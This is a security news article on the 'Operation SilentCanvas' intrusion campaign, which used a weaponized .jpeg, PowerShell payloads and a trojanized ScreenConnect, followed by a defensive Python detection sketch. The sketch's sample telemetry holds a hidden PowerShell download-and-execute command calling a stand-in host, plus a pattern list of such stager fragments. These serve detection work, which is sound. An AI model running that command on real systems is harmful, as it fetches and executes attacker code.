- The attackers weaponized a .jpeg file to deliver PowerShell payloads and a trojanized ScreenConnect build, and to establish persistence.
- The malware enables credential theft, encrypted C2 communications, and surveillance functions.
- Cyfirma warns that the campaign reflects a mature intrusion framework.
Be careful when downloading files from the Internet, as even innocent .jpeg files can contain malware, experts warned.
Security researchers Cyfirma released a detailed report on a new hacking campaign they dubbed “Operation SilentCanvas.” While we don’t know the number of infections or victims successfully compromised, researchers said the campaign likely targets businesses and other organizations that use remote administration tools.
The attack begins when the victim receives the assembled .jpeg file. Again, we don’t know the exact delivery mechanism, but Cyfirma speculates that the file is delivered via phishing emails with malicious attachments, deceptive file-sharing interactions, or fake software and update lures.
“Professionally designed and operationally mature intrusion framework”
In any case, when the victim executes the file, called ‘sysupdate.jpeg’, it actually runs a malicious PowerShell payload that does several things: downloads additional payloads from the attacker’s infrastructure; installs a trojanized version of ConnectWise ScreenConnect for covert remote access; bypasses Windows security protections and elevates privileges by adding malicious Registry entries; and establishes persistence through a fake Windows service called OneDriveServers.
The malware also enables encrypted communications with the command and control (C2) infrastructure, steals credentials, and fingerprints the system. Other supported features include screen capture, microphone capture, and clipboard monitoring.
“The overall art reflects a professionally designed and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments,” Cyfirma concluded, without naming the group or even linking it to a specific country or region.
To defend against this campaign, security experts should be on the lookout for commonly abused Windows binaries, including csc.exe, cvtres.exe, or ComputerDefaults.exe. If possible, these should be blocked completely. Remote access platforms should be strictly monitored and detection rules established for suspicious PowerShell behavior.
Finally, any system that displays unexpected ScreenConnect activity should be isolated immediately.
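As an added defensive illustration (not from the Cyfirma report or this article), the Python sketch below applies the detection advice above to a handful of constructed process-creation and service-install records: it flags the three named Windows binaries, PowerShell command lines carrying download-and-execute fragments, the OneDriveServers service name, and ScreenConnect activity on any host outside a hypothetical allowlist (HELPDESK-01 is an assumed approved host).

```python
import re

# Windows binaries the report names as commonly abused in this campaign.
LOLBINS = {"csc.exe", "cvtres.exe", "computerdefaults.exe"}
# Fake service name the report says the malware registers for persistence.
ROGUE_SERVICES = {"onedriveservers"}
# Hosts where ScreenConnect is approved (hypothetical allowlist, constructed for this example).
SCREENCONNECT_ALLOWLIST = {"HELPDESK-01"}
# PowerShell command-line fragments typical of download-and-execute stagers.
PS_PATTERN = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biex\b|-enc(odedcommand)?\b|frombase64string",
    re.I,
)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, event_id) pairs for records matching the campaign's observed behaviour."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            image = basename(ev["image"])
            if image in LOLBINS:
                hits.append(("abused_windows_binary", ev["id"]))
            if image == "powershell.exe" and PS_PATTERN.search(ev.get("cmdline", "")):
                hits.append(("suspicious_powershell", ev["id"]))
            if image.startswith("screenconnect") and ev["host"] not in SCREENCONNECT_ALLOWLIST:
                hits.append(("unexpected_screenconnect", ev["id"]))
        elif ev["type"] == "service_install" and ev["name"].lower() in ROGUE_SERVICES:
            hits.append(("rogue_service", ev["id"]))
    return hits

# Constructed sample telemetry (Sysmon-style fields); none of it comes from the report.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
    {"id": 2, "type": "process", "host": "WS-042", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": "csc.exe /noconfig /out:stub.dll stub.cs"},
    {"id": 3, "type": "service_install", "host": "WS-042", "name": "OneDriveServers"},
    {"id": 4, "type": "process", "host": "WS-042", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "cmdline": ""},
    {"id": 5, "type": "process", "host": "HELPDESK-01", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "cmdline": ""},
    {"id": 6, "type": "process", "host": "WS-042", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Event 5 (ScreenConnect on the allowlisted host) and event 6 (Notepad) produce no alert, which is the point of pairing the ScreenConnect rule with an allowlist rather than blocking the tool outright.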